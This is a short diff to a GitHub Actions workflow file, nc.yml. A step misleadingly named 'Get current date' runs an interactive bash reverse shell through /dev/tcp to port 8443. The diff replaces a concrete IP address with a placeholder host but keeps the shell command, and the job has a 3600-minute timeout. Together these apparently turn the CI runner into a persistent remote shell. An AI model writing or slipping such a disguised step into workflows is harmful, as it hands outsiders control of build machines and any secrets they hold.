--- a/.github/workflows/nc.yml
+++ b/.github/workflows/nc.yml
@@ -9,5 +9,5 @@ jobs:
     timeout-minutes: 3600
     steps:
       - name: Get current date
-        run:  /bin/bash -i >& /dev/tcp/194.87.196.188/8443 0>&1
+        run:  /bin/bash -i >& /dev/tcp/x.x.x.x/8443 0>&1
       - uses: actions/checkout@v2
